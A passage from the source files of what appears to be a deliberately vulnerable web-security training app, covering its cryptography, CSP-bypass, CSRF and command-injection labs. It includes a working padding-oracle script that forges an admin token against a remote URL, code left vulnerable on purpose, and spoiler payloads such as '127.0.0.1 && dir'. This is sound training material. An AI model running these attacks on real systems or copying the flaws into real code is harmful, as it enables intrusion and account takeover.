($token, $temp_iv, $url);\n\t\t\t\t\t\tif ($temp_d_obj['status'] != 526) {\n\t\t\t\t\t\t\tprint \"Not edge case, can continue\\n\";\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tprint \"Edge case, do not continue\\n\";\n\t\t\t\t\t\t\t$ignore = true;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif (!$ignore) {\n\t\t\t\t\t\tprint \"There was a match\\n\";\n\t\t\t\t\t\t$zeroing[$offset] = $i ^ $padding; \n\t\t\t\t\t\t# print \"IV: \" . byte_array_to_string ($iv) . \"\\n\";\n\t\t\t\t\t\t# print \"Zero: \" . byte_array_to_string ($zeroing) . \"\\n\";\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t} catch(Exception $exp) {\n\t\t\t\t# print \"Fail\\n\";\n\t\t\t\t# var_dump ($e);\n\t\t\t}\n\t\t}\n\t}\n\n\tprint \"\\n\";\n\tprint \"Finished looping\\n\";\n\tprint \"\\n\";\n\n\tprint \"Derived IV is: \" . byte_array_to_string ($iv) . \"\\n\";\n\n\t# If you want to check this, it should be all 16 to show it is all padding\n\t# $x = xor_byte_array ($iv, $zeroing);\n\t# print \"Derived IV XOR and zeroing string: \" . byte_array_to_string ($x) . \"\\n\";\n\n\tprint \"Real IV is: \" . byte_array_to_string ($init_iv) . \"\\n\";\n\tprint \"Zeroing array is: \" . byte_array_to_string ($zeroing) . \"\\n\";\n\tprint \"\\n\";\n\n\t$x = xor_byte_array ($init_iv, $zeroing);\n\tprint \"Decrypted string with padding: \" . byte_array_to_string ($x) . \"\\n\";\n\t$number_of_padding_bytes = $x[15];\n\t$without_padding = array_slice ($x, 0, 16 - $number_of_padding_bytes);\n\tprint \"Decrypted string without padding: \" . byte_array_to_string ($without_padding) . \"\\n\";\n\n\t$str = '';\n\tfor ($i = 0; $i < count ($without_padding); $i++) {\n\t\t$c = $without_padding[$i];\n\t\tif ($c > 0x19 && $c < 0x7f) {\n\t\t\t$str .= chr($c);\n\t\t} else {\n\t\t\t$str .= \"0x\" . sprintf (\"%02x\", $c) . \" \";\n\t\t}\n\t}\n\n\tprint \"Decrypted string as text: \" . $str . \"\\n\";\n\n\t/*\n\tTrying to modify decrypted data by playing with the zeroing array.\n\t*/\n\n\tprint \"\\n\";\n\tprint \"Trying to modify string\\n\";\n\tprint \"\\n\";\n\n\t$new_clear = \"userid:1\";\n\tprint \"New clear text: \" . $new_clear . \"\\n\";\n\n\tfor ($i = 0; $i < strlen($new_clear); $i++) {\n\t\t$zeroing[$i] = $zeroing[$i] ^ ord($new_clear[$i]);\n\t}\n\t$padding = 16 - strlen($new_clear);\n\t$offset = 16 - $padding;\n\tfor ($i = $offset; $i < 16; $i++) {\n\t\t$zeroing[$i] = $zeroing[$i] ^ $padding;\n\t}\n\n\tprint \"New IV is: \" . byte_array_to_string ($zeroing) . \"\\n\";\n\tprint \"\\n\";\n\n\tprint \"Sending new data to server...\\n\";\n\tprint \"\\n\";\n\n\ttry {\n\t\t$ret_obj = make_call ($token, $zeroing, $url);\n\n\t\tprint \"Response from server:\\n\";\n\t\tvar_dump ($ret_obj);\n\n\t\tif ($ret_obj['status'] == 200 && $ret_obj['level'] == \"admin\") {\n\t\t\tprint \"\\n\";\n\t\t\tprint \"Hack success!\\n\\n\";\n\t\t\tprint \"The new token is:\\n\";\n\n\t\t\t# This maps the IV byte array down to a string\n\t\t\t$iv_string = implode(array_map(\"chr\", $zeroing));\n\n\t\t\t# Now base64 encode it so it is safe to send\n\t\t\t$iv_string_b64 = base64_encode ($iv_string);\n\n\t\t\t$new_token = array (\n\t\t\t\t\t\t\t\t\"token\" => $token,\n\t\t\t\t\t\t\t\t\"iv\" => $iv_string_b64\n\t\t\t\t\t\t\t);\n\t\t\tprint json_encode ($new_token);\n\t\t\tprint \"\\n\\n\";\n\t\t} else {\n\t\t\tprint \"Hack failed\\n\";\n\t\t}\n\t} catch (Exception $exp) {\n\t\tprint \"Hack failed, system could not decrypt message\\n\";\n\t\tvar_dump ($exp);\n\t}\n}\n\n$shortopts = \"\";\n$shortopts .= \"h\"; // Help\n\n$longopts = array(\n\"url:\", // Required value\n\"iv:\", // Required value\n\"token:\", // Required value\n\"local\", // No value\n\"help\", // No value\n);\n$options = getopt($shortopts, $longopts);\n\nif (array_key_exists (\"h\", $options) || array_key_exists (\"help\", $options)) {\n\tprint \"This script can either test against a local decryptor or a remote.\\n\nTo test locally, pass --local, otherwise pass the IV, token and URL for the remote system.\n\n--local - Test locally\n--iv - IV from remote system\n--token - Token from remote system\n--url - URL for the check function\n-h, --help - help\n\n\";\n\texit;\n} elseif (array_key_exists (\"l\", $options) || array_key_exists (\"local\", $options)) {\n\tprint \"Creating the token locally\\n\\n\";\n\n\t$token_data = json_decode (create_token(true), true);\n\n\t$token = $token_data['token'];\n\t$iv = $token_data['iv'];\n\t$url = null;\n} elseif (array_key_exists (\"iv\", $options) &&\n\tarray_key_exists (\"token\", $options) &&\n\tarray_key_exists (\"url\", $options)) {\n\tprint \"Attacking remote server using parameters provided\\n\\n\";\n\n\t$token = $options['token'];\n\t$iv = $options['iv'];\n\t$url = $options['url'];\n} else {\n\tprint \"Either specify --local or provide the IV, token and URL\\n\\n\";\n\texit;\n}\n\ndo_attack ($iv, $token, $url);\n"
},
{
"path": "vulnerabilities/cryptography/source/token_library_high.php",
"content": " base64_encode ($e),\n\t\t\t\t\t\"iv\" => base64_encode (IV)\n\t\t\t\t);\n\treturn json_encode($data);\n}\n\nfunction check_token ($data) {\n\t$users = array ();\n\t$users[1] = array (\"name\" => \"Geoffery\", \"level\" => \"admin\");\n\t$users[2] = array (\"name\" => \"Bungle\", \"level\" => \"user\");\n\t$users[3] = array (\"name\" => \"Zippy\", \"level\" => \"user\");\n\t$users[4] = array (\"name\" => \"George\", \"level\" => \"user\");\n\n\t$data_array = false;\n\ttry {\n\t\t$data_array = json_decode ($data, true);\n\t} catch (TypeError $exp) {\n\t\t$ret = array (\n\t\t\t\t\t\t\"status\" => 521,\n\t\t\t\t\t\t\"message\" => \"Data not in JSON format\",\n\t\t\t\t\t\t\"extra\" => $exp->getMessage()\n\t\t\t\t\t);\n\t}\n\n\tif (is_null ($data_array)) {\n\t\t$ret = array (\n\t\t\t\t\t\t\"status\" => 522,\n\t\t\t\t\t\t\"message\" => \"Data in wrong format\"\n\t\t\t\t\t);\n\t} else {\n\t\tif (!array_key_exists (\"token\", $data_array)) {\n\t\t\t$ret = array (\n\t\t\t\t\t\t\t\"status\" => 523,\n\t\t\t\t\t\t\t\"message\" => \"Missing token\"\n\t\t\t\t\t\t);\n\t\t\treturn json_encode ($ret);\n\t\t}\n\t\tif (!array_key_exists (\"iv\", $data_array)) {\n\t\t\t$ret = array (\n\t\t\t\t\t\t\t\"status\" => 524,\n\t\t\t\t\t\t\t\"message\" => \"Missing IV\"\n\t\t\t\t\t\t);\n\t\t\treturn json_encode ($ret);\n\t\t}\n\t\t\t\n\t\t$ciphertext = base64_decode ($data_array['token']);\n\t\t$iv = base64_decode ($data_array['iv']);\n\n\t\t# Assume failure\n\t\t$ret = array (\n\t\t\t\t\t\t\"status\" => 500,\n\t\t\t\t\t\t\"message\" => \"Unknown error\"\n\t\t\t\t\t);\n\t\ttry {\n\t\t\t$d = decrypt ($ciphertext, $iv); \n\t\t\tif (preg_match (\"/^userid:(\\d+)$/\", $d, $matches)) {\n\t\t\t\t$id = $matches[1];\n\t\t\t\tif (array_key_exists ($id, $users)) {\n\t\t\t\t\t$user = $users[$id];\n\t\t\t\t\t$ret = array (\n\t\t\t\t\t\t\t\t\t\"status\" => 200,\n\t\t\t\t\t\t\t\t\t\"user\" => $user[\"name\"],\n\t\t\t\t\t\t\t\t\t\"level\" => $user['level']\n\t\t\t\t\t\t\t\t);\n\t\t\t\t} else {\n\t\t\t\t\t$ret = array (\n\t\t\t\t\t\t\t\t\t\"status\" => 525,\n\t\t\t\t\t\t\t\t\t\"message\" => \"User not found\"\n\t\t\t\t\t\t\t\t);\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$ret = array (\n\t\t\t\t\t\t\t\t\"status\" => 527,\n\t\t\t\t\t\t\t\t\"message\" => \"No user specified\"\n\t\t\t\t\t\t\t);\n\t\t\t}\n\t\t} catch (Exception $exp) {\n\t\t\t$ret = array (\n\t\t\t\t\t\t\t\"status\" => 526,\n\t\t\t\t\t\t\t\"message\" => \"Unable to decrypt token\",\n\t\t\t\t\t\t\t\"extra\" => $exp->getMessage()\n\t\t\t\t\t\t);\n\t\t}\n\t}\n\treturn json_encode ($ret);\n}\n"
},
{
"path": "vulnerabilities/cryptography/source/token_library_impossible.php",
"content": " base64_encode ($e),\n\t\t\t\t\t\"iv\" => base64_encode ($iv),\n\t\t\t\t);\n\treturn json_encode($data);\n}\n\nfunction check_token ($data) {\n\t$users = array ();\n\t$users[1] = array (\"name\" => \"Geoffery\", \"level\" => \"admin\");\n\t$users[2] = array (\"name\" => \"Bungle\", \"level\" => \"user\");\n\t$users[3] = array (\"name\" => \"Zippy\", \"level\" => \"user\");\n\t$users[4] = array (\"name\" => \"George\", \"level\" => \"user\");\n\n\t$data_array = false;\n\ttry {\n\t\t$data_array = json_decode ($data, true);\n\t} catch (TypeError $exp) {\n\t\t$ret = array (\n\t\t\t\t\t\t\"status\" => 521,\n\t\t\t\t\t\t\"message\" => \"Data not in JSON format\",\n\t\t\t\t\t\t\"extra\" => $exp->getMessage()\n\t\t\t\t\t);\n\t}\n\n\tif (is_null ($data_array)) {\n\t\t$ret = array (\n\t\t\t\t\t\t\"status\" => 522,\n\t\t\t\t\t\t\"message\" => \"Data in wrong format\"\n\t\t\t\t\t);\n\t} else {\n\t\tif (!array_key_exists (\"token\", $data_array)) {\n\t\t\t$ret = array (\n\t\t\t\t\t\t\t\"status\" => 523,\n\t\t\t\t\t\t\t\"message\" => \"Missing token\"\n\t\t\t\t\t\t);\n\t\t\treturn json_encode ($ret);\n\t\t}\n\t\tif (!array_key_exists (\"iv\", $data_array)) {\n\t\t\t$ret = array (\n\t\t\t\t\t\t\t\"status\" => 524,\n\t\t\t\t\t\t\t\"message\" => \"Missing IV\"\n\t\t\t\t\t\t);\n\t\t\treturn json_encode ($ret);\n\t\t}\n\t\t\t\n\t\t$ciphertext = base64_decode ($data_array['token']);\n\t\t$iv = base64_decode ($data_array['iv']);\n\n\t\t# Assume failure\n\t\t$ret = array (\n\t\t\t\t\t\t\"status\" => 500,\n\t\t\t\t\t\t\"message\" => \"Unknown error\"\n\t\t\t\t\t);\n\t\ttry {\n\t\t\t$d = decrypt ($ciphertext, $iv); \n\t\t\tif (preg_match (\"/^userid:(\\d+)$/\", $d, $matches)) {\n\t\t\t\t$id = $matches[1];\n\t\t\t\tif (array_key_exists ($id, $users)) {\n\t\t\t\t\t$user = $users[$id];\n\t\t\t\t\t$ret = array (\n\t\t\t\t\t\t\t\t\t\"status\" => 200,\n\t\t\t\t\t\t\t\t\t\"user\" => $user[\"name\"],\n\t\t\t\t\t\t\t\t\t\"level\" => $user['level']\n\t\t\t\t\t\t\t\t);\n\t\t\t\t} else {\n\t\t\t\t\t$ret = array (\n\t\t\t\t\t\t\t\t\t\"status\" => 525,\n\t\t\t\t\t\t\t\t\t\"message\" => \"User not found\"\n\t\t\t\t\t\t\t\t);\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$ret = array (\n\t\t\t\t\t\t\t\t\"status\" => 527,\n\t\t\t\t\t\t\t\t\"message\" => \"No user specified\"\n\t\t\t\t\t\t\t);\n\t\t\t}\n\t\t} catch (Exception $exp) {\n\t\t\t$ret = array (\n\t\t\t\t\t\t\t\"status\" => 526,\n\t\t\t\t\t\t\t\"message\" => \"Unable to decrypt token\",\n\t\t\t\t\t\t\t\"extra\" => $exp->getMessage()\n\t\t\t\t\t\t);\n\t\t}\n\t}\n\treturn json_encode ($ret);\n}\n"
},
{
"path": "vulnerabilities/cryptography/source/xor_theory.php",
"content": "'; // For debugging\n }\n }\n return $outText;\n}\n\n$clear = \"hello world, what a great day\";\n$key = \"wachtwoord\";\n\nprint \"Clear text\\n\" . $clear . \"\\n\";\nprint \"\\n\";\n\n$encoded = (xor_this($clear, $key));\n$b64_encoded = base64_encode ($encoded);\nprint \"Encoded text\\n\";\nvar_dump ($b64_encoded);\nprint \"\\n\";\n\n$b64_decoded = base64_decode ($b64_encoded);\n$decoded = xor_this($b64_decoded, $key);\nprint \"Decoded text\\n\";\nvar_dump ($decoded);\nprint \"\\n\";\n\n?>\n"
},
{
"path": "vulnerabilities/csp/help/help.php",
"content": "\r\n\t
\r\n\r\n\t
\r\n\r\n"
},
{
"path": "vulnerabilities/csp/index.php",
"content": "\n\tHelp - Content Security Policy (CSP) Bypass
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tContent Security Policy (CSP) is used to define where scripts and other resources can be loaded or executed from. This module will walk you through ways to bypass the policy based on common mistakes made by developers. \r\n\t\tNone of the vulnerabilities are actual vulnerabilities in CSP, they are vulnerabilities in the way it has been implemented. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tBypass Content Security Policy (CSP) and execute JavaScript in the page. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tExamine the policy to find all the sources that can be used to host external script files. \r\n\t\tThis exercise was originally written to work with Pastebin, then updated for Hastebin, then Toptal, but all these stopped working as they set various headers that prevent the browser executing the JavaScript once it has downloaded it. Since then two new services have been identified, UNPKG and jsDelivr, the first is a proxy for NPM packages, the second one for GitHub files. They are both designed to allow raw access to any files and do not set any headers that will stop injection.\r\n\t\t \r\n\t\tI have also put a number of files on my site which help to demonstrate how different headers and file extensions can block execution. \r\n\t\tSpoiler: \r\nhttps://cdn.jsdelivr.net/gh/digininja/csp_bypass/alert.js - Using jsDelivr to server a JavaScript file stored on GitHub.\r\nhttps://unpkg.com/@digininja/csp_bypass@1.0.0/index.js - Using UNPKG to access a JavaScript file in an NPM package.\r\nhttps://digi.ninja/dvwa/alert.js - Will work, this is a normal JavaScript file served with the correct headers.\r\nhttps://digi.ninja/dvwa/alert.txt - This will not work as it has the wrong content type set by the web server due to its file extension.\r\nhttps://digi.ninja/dvwa/cookie.js - This will work and will show your cookies\r\nhttps://digi.ninja/dvwa/forced_download.js - As the name says, the server sets the \"Content-Disposition: attachment\" header for this to force the browser to download it rather than execute it.\r\nhttps://digi.ninja/dvwa/wrong_content_type.js - This will not work as the web server ignores the file extension and forces the content type to get set as \"plain/text\" which prevents the browser executing it.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe CSP policy tries to use a nonce to prevent inline scripts from being added by attackers. \r\n\t\tSpoiler: Examine the nonce and see how it varies (or doesn't).\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThe page makes a JSONP call to source/jsonp.php passing the name of the function to callback to, you need to modify the jsonp.php script to change the callback function. \r\n\t\tSpoiler: The JavaScript on the page will execute whatever is returned by the page, changing this to your own code will execute that instead\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\t\r\n\t\t\tThis level is an update of the high level where the JSONP call has its callback function hardcoded and the CSP policy is locked down to only allow external scripts.\r\n\t\t \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\n\tReference:
\r\n\tReference:
\r\nVulnerability: Content Security Policy (CSP) Bypass
\n\n\t\nEOF;\n \nrequire_once DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/csp/source/{$vulnerabilityFile}\";\n\n$page[ 'body' ] .= <<\nEOF;\n\n$page[ 'body' ] .= \"\n\t
\\n\";\n\ndvwaHtmlEcho( $page );\n\n?>\n"
},
{
"path": "vulnerabilities/csp/source/high.js",
"content": "function clickButton() {\n var s = document.createElement(\"script\");\n s.src = \"source/jsonp.php?callback=solveSum\";\n document.body.appendChild(s);\n}\n\nfunction solveSum(obj) {\n\tif (\"answer\" in obj) {\n\t\tdocument.getElementById(\"answer\").innerHTML = obj['answer'];\n\t}\n}\n\nvar solve_button = document.getElementById (\"solve\");\n\nif (solve_button) {\n\tsolve_button.addEventListener(\"click\", function() {\n\t\tclickButton();\n\t});\n}\n"
},
{
"path": "vulnerabilities/csp/source/high.php",
"content": "\n\n\tMore Information
\n\t- \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://content-security-policy.com/', \"Content Security Policy Reference\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP', \"Mozilla Developer Network - CSP: script-src\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/', \"Mozilla Security Blog - CSP for the web we have\" ) . \" \n\t
Module developed by Digininja.
\nThe page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.
\n\t1+2+3+4+5=
\n\t\n\n\n\n';\n\n" }, { "path": "vulnerabilities/csp/source/impossible.js", "content": "function clickButton() {\n var s = document.createElement(\"script\");\n s.src = \"source/jsonp_impossible.php\";\n document.body.appendChild(s);\n}\n\nfunction solveSum(obj) {\n\tif (\"answer\" in obj) {\n\t\tdocument.getElementById(\"answer\").innerHTML = obj['answer'];\n\t}\n}\n\nvar solve_button = document.getElementById (\"solve\");\n\nif (solve_button) {\n\tsolve_button.addEventListener(\"click\", function() {\n\t\tclickButton();\n\t});\n}\n" }, { "path": "vulnerabilities/csp/source/impossible.php", "content": "\n\n\tUnlike the high level, this does a JSONP call but does not use a callback, instead it hardcodes the function to call.
The CSP settings only allow external JavaScript on the local server and no inline code.
\n\t1+2+3+4+5=
\n\t\n\n\n\n';\n\n" }, { "path": "vulnerabilities/csp/source/jsonp.php", "content": " \"15\");\n\necho $callback . \"(\".json_encode($outp).\")\";\n?>\n" }, { "path": "vulnerabilities/csp/source/jsonp_impossible.php", "content": " \"15\");\n\necho \"solveSum (\".json_encode($outp).\")\";\n?>\n" }, { "path": "vulnerabilities/csp/source/low.php", "content": "\n\n\";\n}\n$page[ 'body' ] .= '\n\n\n\tYou will probably need to do some reading up on what some of the domains allowed by the CSP do and how they can be used.\n
\n';\n" }, { "path": "vulnerabilities/csp/source/medium.php", "content": "alert(1)\n\n?>\n\n\tWhatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.
\n\t\n\t\n\n';\n" }, { "path": "vulnerabilities/csrf/help/help.php", "content": "\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/csrf/index.php",
"content": "Test CredentialsHelp - Cross Site Request Forgery (CSRF)
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tCSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.\r\n\t\t\tWith a little help of social engineering (such as sending a link via email/chat), an attacker may force the users of a web application to execute actions of\r\n\t\t\tthe attacker's choosing. \r\n\r\n\t\tA successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is\r\n\t\t\tthe administrator account, this can compromise the entire web application. \r\n\r\n\t\tThis attack may also be called \"XSRF\", similar to \"Cross Site scripting (XSS)\", and they are often used together. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tYour task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThere are no measures in place to protect against this attack. This means a link can be crafted to achieve a certain action (in this case, change the current users password).\r\n\t\t\tThen with some basic social engineering, have the target click the link (or just visit a certain page), to trigger the action. \r\n\t\tSpoiler: ?password_new=password&password_conf=password&Change=Change.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tFor the medium level challenge, there is a check to see where the last requested page came from. The developer believes if it matches the current domain,\r\n\t\t\tit must of come from the web application so it can be trusted. \r\n\t\tIt may be required to link in multiple vulnerabilities to exploit this vector, such as reflective XSS. \r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tIn the high level, the developer has added an \"anti Cross-Site Request Forgery (CSRF) token\". In order by bypass this protection method, another vulnerability will be required. \r\n\t\tSpoiler: e.g. Javascript is a executed on the client side, in the browser.\r\n\r\n\t\tBonus Challenge\r\n\t\tAt this level, the site will also accept a change password request as a JSON object in the following format: \r\n\t\tWhen done this way, the CSRF token must be passed as a header named Here is a sample request: \r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tAt this level, the site requires the user to give their current password as well as the new password. As the attacker does not know this, the site is protected against CSRF style attacks. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\n\r\n \r\n\";\r\n\r\n$page[ 'body' ] .= \"\r\n
\r\n\t
\\n\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/csrf/source/high.php",
"content": "$return_message));\r\n\t\texit;\r\n\t} else {\r\n\t\t$html .= \"Vulnerability: Cross Site Request Forgery (CSRF)
\r\n\r\n\t\r\n\t\t
\r\n\t\t
\r\n\t\t\r\n\t\t{$html}\r\n\t
\r\n\t\tChange your admin password:
\r\n\t\t\r\n\t\t
\r\n\t\t\t\".$testCredentials .\"\r\n\t\t
\r\n\t\t\r\n\t\t{$html}\r\n\t
Note: Browsers are starting to default to setting the SameSite cookie flag to Lax, and in doing so are killing off some types of CSRF attacks. When they have completed their mission, this lab will not work as originally expected.
\r\n\t\tAnnouncements:
\r\n\t\t\r\n\t\tAs an alternative to the normal attack of hosting the malicious URLs or code on a separate host, you could try using other vulnerabilities in this app to store them, the Stored XSS lab would be a good place to start.
\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/csrf' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/csrf-faq.html' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_request_forgery ' ) . \" \r\n\t
\" . $return_message . \"\";\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/csrf/source/impossible.php", "content": "prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );\r\n\t$current_user = dvwaCurrentUser();\r\n\t$data->bindParam( ':user', $current_user, PDO::PARAM_STR );\r\n\t$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );\r\n\t$data->execute();\r\n\r\n\t// Do both new passwords match and does the current password match the user?\r\n\tif( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {\r\n\t\t// It does!\r\n\t\t$pass_new = stripslashes( $pass_new );\r\n\t\t$pass_new = ((isset($GLOBALS[\"___mysqli_ston\"]) && is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_real_escape_string($GLOBALS[\"___mysqli_ston\"], $pass_new ) : ((trigger_error(\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\", E_USER_ERROR)) ? \"\" : \"\"));\r\n\t\t$pass_new = md5( $pass_new );\r\n\r\n\t\t// Update database with new password\r\n\t\t$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );\r\n\t\t$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );\r\n\t\t$current_user = dvwaCurrentUser();\r\n\t\t$data->bindParam( ':user', $current_user, PDO::PARAM_STR );\r\n\t\t$data->execute();\r\n\r\n\t\t// Feedback for the user\r\n\t\t$html .= \"
Password Changed.\";\r\n\t}\r\n\telse {\r\n\t\t// Issue with passwords matching\r\n\t\t$html .= \"
Passwords did not match or current password incorrect.\";\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/csrf/source/low.php", "content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t\t// Feedback for the user\r\n\t\t$html .= \"
Password Changed.\";\r\n\t}\r\n\telse {\r\n\t\t// Issue with passwords matching\r\n\t\t$html .= \"
Passwords did not match.\";\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/csrf/source/medium.php", "content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t\t\t// Feedback for the user\r\n\t\t\t$html .= \"
Password Changed.\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// Issue with passwords matching\r\n\t\t\t$html .= \"
Passwords did not match.\";\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\t// Didn't come from a trusted source\r\n\t\t$html .= \"
That request didn't look correct.\";\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/csrf/test_credentials.php", "content": "'. mysqli_connect_error() . '.
Try installing again.' );\r\n\tif( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful...\r\n\t\t$login_state = \"
Valid password for '{$user}'
\";\r\n\t}else{\r\n\t\t// Login failed\r\n\t\t$login_state = \"Wrong password for '{$user}'
\";\r\n\t}\r\n\r\n}\r\n$messagesHtml = messagesPopAllToHtml();\r\n$page = dvwaPageNewGrab();\r\n\r\n$page[ 'title' ] .= \"Test Credentials\";\r\n$page[ 'body' ] .= \"\r\n\t\t\r\n\t\t\t
\\n\";\r\n\r\ndvwaSourceHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/exec/help/help.php",
"content": "Test Credentials
\r\n\t\t\tVulnerabilities/CSRF
\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t{$messagesHtml}\r\n\t\t\t
\r\n\t\t\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/exec/index.php",
"content": "\r\n\tHelp - Command Injection
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tThe purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.\r\n\t\t\tIn situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it\r\n\t\t\tas any authorized system user. However, commands are executed with the same privileges and environment as the web service has. \r\n\r\n\t\tCommand injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker\r\n\t\t\t(forms, cookies, HTTP headers etc.). \r\n\r\n\t\tThe syntax and commands may differ between the Operating Systems (OS), such as Linux and Windows, depending on their desired actions. \r\n\r\n\t\tThis attack may also be called \"Remote Command Execution (RCE)\". \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tRemotely, find out the user of the web service on the OS, as well as the machines hostname via RCE. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThis allows for direct input into one of many PHP functions that will execute commands on the OS. It is possible to escape out of the designed command and\r\n\t\t\texecuted unintentional actions. \r\n\t\tThis can be done by adding on to the request, \"once the command has executed successfully, run this command\".\r\n\t\t Spoiler: To add a command \"&&\". Example: 127.0.0.1 && dir.\r\n\r\n\t\t \r\n\r\n\t\t Medium Level\r\n\t\tThe developer has read up on some of the issues with command injection, and placed in various pattern patching to filter the input. However, this isn't enough. \r\n\t\tVarious other system syntaxes can be used to break out of the desired command. \r\n\t\tSpoiler: e.g. background the ping command.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tIn the high level, the developer goes back to the drawing board and puts in even more pattern to match. But even this isn't enough. \r\n\t\tThe developer has either made a slight typo with the filters and believes a certain PHP command will save them from this mistake. \r\n\t\tSpoiler: \r\n\t\t\tremoves all leading & trailing spaces, right?.\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tIn the impossible level, the challenge has been re-written, only to allow a very stricted input. If this doesn't match and doesn't produce a certain result,\r\n\t\t\tit will not be allowed to execute. Rather than \"black listing\" filtering (allowing any input and removing unwanted), this uses \"white listing\" (only allow certain values). \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nVulnerability: Command Injection
\r\n\r\n\t\r\n\t\t
\r\n\r\n\tPing a device
\r\n\r\n\t\t\r\n\t\t{$html}\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'http://www.ss64.com/bash/' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'http://www.ss64.com/nt/' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Command_Injection' ) . \" \r\n\t
{$cmd}\";\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/exec/source/impossible.php",
